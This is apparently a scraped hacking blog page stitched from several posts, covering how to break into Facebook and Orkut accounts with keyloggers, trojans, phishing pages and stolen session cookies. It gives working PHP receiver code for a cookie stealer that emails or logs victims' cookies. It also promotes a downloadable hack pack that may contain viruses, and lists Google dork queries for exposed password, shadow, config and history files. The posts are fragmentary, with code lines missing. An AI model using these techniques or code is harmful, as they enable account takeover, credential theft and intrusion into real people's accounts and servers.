If u recieve some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will recieve a clear IP.
once u have d IP u can do anything with him by Fingerprinting.
U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).
How to Hack a Facebook Account
Facebook is one of the most widely used Social Networking website by many teenagers across the world . most of them are now a days making the fake accounts both for abuse or maintaining secret relations. So, it’s no wonder many people want to know how to hack a Facebook account.
now i will show you some of the working and best ways to hack a Facebook account
now a days the security standards are greatly increased even the brute force attacks don’t work don’t get fooled there are so many people who try to fool the people by telling them to hack Facebook and any other service like orkut ,gmail,yahoo, orkut, there are only at most 5 ways to hack into these but newbie can at most use 3 types you must learn so much to try 4-5 ways and these 4-5 ways are almost have 99 % success rate
In this post i am going to discuss 3 fool proof methods and some intro abt the remaining 4th and 5th methods
1.BEST AND EASIEST WAY TO HACK A Facebook
The easy way to hack in to the Facebook account is through keyloggers
check this post i have covered all the topics about key loggers and using them to hack Facebook accounts
Hacking with Keyloggers :Topics covered
1. What is a keylogger?
2. Where to get the key logger programs and download links
3. How to install a keylogger
4.what to do when you don’t have the physical access
5. What to do target OR victim refuses to run the file?
6.Which is the best spying or keylogger soft
2. how to hack Facebook using the Trojan
This is same as the keyloggers if u want more control over the victom then u can use trojans (Rats) these are remote administrator tools which give the complete control over the victim system
check this post : how to use the trojans to hack Facebook
i covered full topics on using the trojans
1. What is a trojan?
2. Where to get the trojan programs and download links
3. How to install a trojan
4.what to do when you don’t have the physical access
5. What to do target OR victom refuses to run the file?
6.Which is the best trojans or rat software
3.HACKING Facebook ACCOUT BY PHISHING
PHISHING is the most commonly used method to hack into any web based systems like orkut ,gmail ,yahoo.
phishing is proved the best and easy way to hack into any web based system u can even hack into Facebook it has high success rate . And also there is no need of any scripting knowledge like html just upload the page to any free hosting accounts and send to the victim.
if u want the Facebook fake page go to here :
4-5 th method of hacking into Facebook
These methods are very complicated and canot be used by the new bies this involves finding the vonerabilities and exploiting them to gain the tool access
this has very high success rate the only difficult part is to find the ip of the victim
If you just wanna give a try these software : metasploit
UPDATE:
6 : NEW Face book hacks
FBController – The Ultimate Utility to Control Facebook Accounts
You need to feed it biscuits (cookies) before you can do anything.
You can get the target’s cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, Scroogle search or however you like.
Once you have the cookies you can use FBController to have Full control over the target’s Facebook account.
Login to your Facebook account and sniff your own cookie OR collect a few live Facebook Biscuit/s of your Target/s.
Till now FBController version 1.0 uses your Target’s provided cookie and only :
A > Downloads the HomePage.
B > Allows you to Update the Target’s Wall and
C > Retrieve your Target’s Friend’s List
There are many APIs available to write apps and 3rd party Tools for FB in Java, Perl, .NET, etc.
FBConTroller was entirely written without knowing any of Facebook’s Dev API’s. Considering the above along with Facebook’s complexity, the next version might take some time to get released
You can download FBController here:
FBConTroller.RAR
happy hacking
How to make cookies and hack Orkut accounts
How to Make a Cookie Stealer
Introduction
Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
Step One: The Code
Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.
Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.
// Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
MSN Hackers Edition
New!: MSN Hackers Edition! MSN Hackers Edition is a AIO with 85 hacks. It got MSN Hacks, Phishers, Yahoo hacks, MSN Fun Tools and other hackers tools! You need to download this! It's FREE. This AIO dont got realy virusses, inside the rar file is also a virus scan list! We are not responsible for the thing that you do with this hack pack. Maybe there are some real virusses in this pack so run it with sandbox! I hope you like with AIO . If you got questions , mail me! Enjoy!!!!
Google search tips for hacking
search engine can be used to hack into remote servers or gather confidential or sensitive information which are not visible through common searches.
Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results.
Google’s Advanced Search Query Syntax
Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data.
[ intitle: ]
The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.
intitle: login password
will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page.
Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title.
intitle: login intitle: password
is same as
allintitle: login password
[ inurl: ]
The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.
Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it.
allinurl: etc/passwd
will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.
[ site: ]
The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.
exploits site:hackingspirits.com
will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.
[ filetype: ]
This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).
filetype:doc site:gov confidential
will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.
[ link: ]
“link:” syntax will list down webpages that have links to the specified webpage.
link:www.expertsforge.com
will list webpages that have links pointing to the SecurityFocus homepage. Note there can be no space between the "link:" and the web page url.
[ related: ]
The “related:” will list web pages that are "similar" to a specified
web page.
related:www.expertsforge.com
will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url.
[ cache: ]
The query “cache:” will show the version of the web page that Google
has in its cache.
cache:www.hackingspirits.com
will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.
If you include other words in the query, Google will highlight those words within the cached document.
cache:www.hackingspirits.com guest
will show the cached content with the word "guest" highlighted.
[ intext: ]
The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles.
intext:exploits
will return only links to those web pages that has the search keyword "exploits" in its webpage.
[ phonebook: ]
“phonebook” searches for U.S. street address and phone number information.
phonebook:Lisa+CA
will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering.
Google Hacks
Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.
Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.
Index Of
Using “Index of ” syntax to find sites enabled with Index browsing
A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
Looking for vulnerable sites or servers using “inurl:” or “allinurl:”
a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.
b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:
http://www.securiteam.com/exploits/2BUQ4S0SAW.html
c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.
d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.
For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following
links: http://www.securiteam.com/securitynews/6M00H2K5PG.html
Other similar search using “inurl:” or “allinurl:” combined with other syntax
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
Looking for vulnerable sites or servers using “intitle:” or “allintitle:”
a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.
b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.
Other similar search using “intitle:” or “allintitle:” combined with other syntax
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
Other interesting Search Queries
· To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks:
allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
To search for sites vulnerable to SQL Injection attacks:
allinurl:/privmsg.php
allinurl:/privmsg.php
Subscribe to:
Comments (Atom)